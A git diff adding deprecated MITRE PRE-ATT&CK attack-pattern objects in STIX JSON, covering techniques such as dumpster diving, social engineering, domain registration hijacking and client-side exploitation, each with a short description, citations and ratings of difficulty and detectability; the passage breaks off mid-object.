"x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design. Application of privacy settings is not a panacea.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1050", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd.json new file mode 100644 index 0000000000000000000000000000000000000000..3d7d363a405ac2c5af160d288e6abb4ea679c700 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--255f4a1c-8073-4f04-b5c6-89022f328d4f", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine firmware version", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).\n\nFirmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1258", + "external_id": "T1258" + }, + { + "source_name": "Abdelnur Advanced Fingerprinting", + "description": "Humberto J. Abdelnur, Radu State, Olivier Festor. (2008). Advanced Network Fingerprinting. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No easy way for defenders to detect when an adversary collects this information.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Depending upon the target device, there are variable ways for an adversary to determine the firmware version. In some cases, this information can be derived from easily obtained information. For example, in [http://www.cisco.com Cisco] devices, the firmware version is easily determined once the device model and OS version is known since it is included in the release notes.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1035", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d.json new file mode 100644 index 0000000000000000000000000000000000000000..d7475e5381b26ecb4ef69b0f684196938500edce --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--cdaa30d6-f082-4c1c-88da-eaa536c2093e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dumpster dive", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).\n\nDumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1286", + "external_id": "T1286" + }, + { + "source_name": "FriedDumpsters", + "description": "Robert B. Fried. (n.d.). Dumpsters: Beware of Treasures. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Strong physical security and monitoring will detect this behavior if performed on premises.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Not difficult if waste is placed in an unsecured or minimally secured area before collection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1063", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b.json new file mode 100644 index 0000000000000000000000000000000000000000..eac62deed7dbfc906778a70fbc092700326bec05 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--af78eae8-7168-4701-aadc-d186c86d23f1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Host-based hiding techniques", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).\n\nHost based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1314", + "external_id": "T1314" + }, + { + "source_name": "VirutAP", + "description": "Microsoft Malware Protection Center. (2008, July 30). Virus: Win32/Virut.AP. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Techniques are difficult to detect and might occur in uncommon use-cases (e.g., patching, anti-malware, anti-exploitation software).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Some of the host-based hiding techniques require advanced knowledge combined with an understanding and awareness of the target's environment (e.g., exploiting weaknesses in file formats, parsers and detection capabilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1091", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148.json new file mode 100644 index 0000000000000000000000000000000000000000..0aaa67915c401762c1c76a9332959169cb20e0bf --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--67883864-f934-4b45-9386-08ac8af6aa1b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Push-notification client-side exploit", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1373", + "url": "https://attack.mitre.org/techniques/T1373" + }, + { + "description": "Joshua Drake. (2015, August 5). Stagefright: Scary Code in the Heart of Android. Retrieved March 29, 2017.", + "source_name": "BlackHat Stagefright" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:22:23.446Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1150", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily executed technique to push an MMS-type message to the target which does not require interaction on the part of the target to be successful.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "For non-corporate cellular devices not joined to the corporate network, it is not possible to detect an adversary's use of the technique because messages traverse networks outside of the control of the employer. For corporate cellular devices which are joined to the corporate network, monitoring of messages and ability to patch against push attacks is possible, assuming they are fully monitored.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25.json new file mode 100644 index 0000000000000000000000000000000000000000..717772825149d0edf31edeb588a9fb8d37c4eb1c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--e5754c75-b088-4b87-aaab-be0c47124dbc", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user's computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1371", + "url": "https://attack.mitre.org/techniques/T1371" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + }, + { + "description": "Fahmida Y. Rashid. (2015, February 11). Chinese Attackers Hacked Forbes Website in Watering Hole Attack: Security Firms. Retrieved March 7, 2017.", + "source_name": "ForbesSecurityWeek" + }, + { + "description": "Kurt Baumgartner. (2016, October 3). On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users. Retrieved May 9, 2017.", + "source_name": "StrongPity-waterhole" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:52.970Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1148", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery. The additional challenge is the reduced set of options for web sites to compromise since the set is reduced to those often visited by targets of interest.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not foolproof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised. The added challenge for a conditional watering hole is the reduced scope and likely reduced ability to detect or be informed. Determining deltas in content (e.g., differences files type/size/number/hashes) downloaded could also aid in detection.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39.json new file mode 100644 index 0000000000000000000000000000000000000000..c03600feaf9cf9aa3549c1f6a1d7bd8b848e70fc --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--0aa75c30-02f2-4f23-b314-357e5629a4ac", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1331", + "external_id": "T1331" + }, + { + "source_name": "FireEyeAPT17", + "description": "FireEye. (2015, May). APT17: Hiding in Plain Sight - FireEye and Microsoft Expose Obfuscation Tactic. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will generally not have visibility into their infrastructure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Building and testing infrastructure and obfuscating it to protect it against intrusions are a standard part of the adversary process in preparing to conduct an operation against a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1108", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1.json new file mode 100644 index 0000000000000000000000000000000000000000..2c7b21bedc3dae5257386ea2bba876528a23566a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--25669987-3397-49b6-9bdc-475c694d2007", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1249", + "external_id": "T1249" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting technical information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1026", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--78e41091-d10d-4001-b202-89612892b6ff.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--78e41091-d10d-4001-b202-89612892b6ff.json new file mode 100644 index 0000000000000000000000000000000000000000..7783ea72876331a600a0e115414231cc363fc374 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--78e41091-d10d-4001-b202-89612892b6ff.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--f427c282-6b45-435e-8d24-6a73ae3393e0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1246", + "external_id": "T1246" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + }, + { + "source_name": "RSA-supply-chain", + "description": "RSA Research. (2017, February). KINGSLAYER \u2013 A SUPPLY CHAIN ATTACK. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, if not impossible to detect, because the adversary may collect this information from external sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Supply chain diversity of sourcing increases adversary difficulty with accurate mapping. Industry practice has moved towards agile sourcing.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1023", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f.json new file mode 100644 index 0000000000000000000000000000000000000000..6a584c06b5f704a72ac12da5786afafd429c8e64 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2da5a68c-2f3b-4758-aec2-49741669d6ab", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit public-facing application", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).**\n\nThe use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1377", + "url": "https://attack.mitre.org/techniques/T1377" + }, + { + "description": "PETER BRIGHT. (2013, November 6). Google crawler tricked into performing SQL injection attacks using decade-old technique. Retrieved March 9, 2017.", + "source_name": "GoogleCrawlerSQLInj" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:20:54.394Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1154", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Launching a SQL injection attack is not overly complex and a commonly used technique. This technique, however, requires finding a vulnerable application.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "If the application and network are designed well, the defender should be able to utilize logging and application logic to catch and deflect SQL injection attacks.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7.json new file mode 100644 index 0000000000000000000000000000000000000000..e20b87027f127e8b106689ccbb24ed2e8de5cdc5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--6abe7d87-aeb5-42b1-a5db-e4f0708eeef8", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate operational infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1318", + "external_id": "T1318" + }, + { + "source_name": "DellComfooMasters", + "description": "Joe Stewart and Don Jackson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence. (2013, July 31). Secrets of the Comfoo Masters. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect given a significant sample size, depending on how the unique identifier is used detection may be difficult as similar patterns may be employed elsewhere (e.g., content hosting providers, account reset URLs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily generate pseudo-random identifiers to associate with a specific target, include the indicator as part of a URL and then identify which target was successful.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1095", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a.json new file mode 100644 index 0000000000000000000000000000000000000000..20bda34c7c3f27344a85aa6f9aa797e05fd99f31 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--3b20184c-419d-4dec-950d-b1082e4f3a91", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain registration hijacking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1326).\n\nDomain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1326", + "external_id": "T1326" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1103", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires adversary to gain access to an email account for person listed as the domain registrar/POC. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or take advantage of renewal process gaps.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Generally not easily detectable unless domain registrar provides alerting on any updates.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910.json new file mode 100644 index 0000000000000000000000000000000000000000..a0b3c1f73f483ed2172241026db263d5e90b2684 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--57a6a505-29db-408d-907d-b7e01da5bfb9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create implementation plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1232).\n\nImplementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1232", + "external_id": "T1232" + }, + { + "source_name": "ChinaCollectionPlan", + "description": "Thomas B Inglis. (1946, December 31). COLLECTION PLAN TO IMPLEMENT 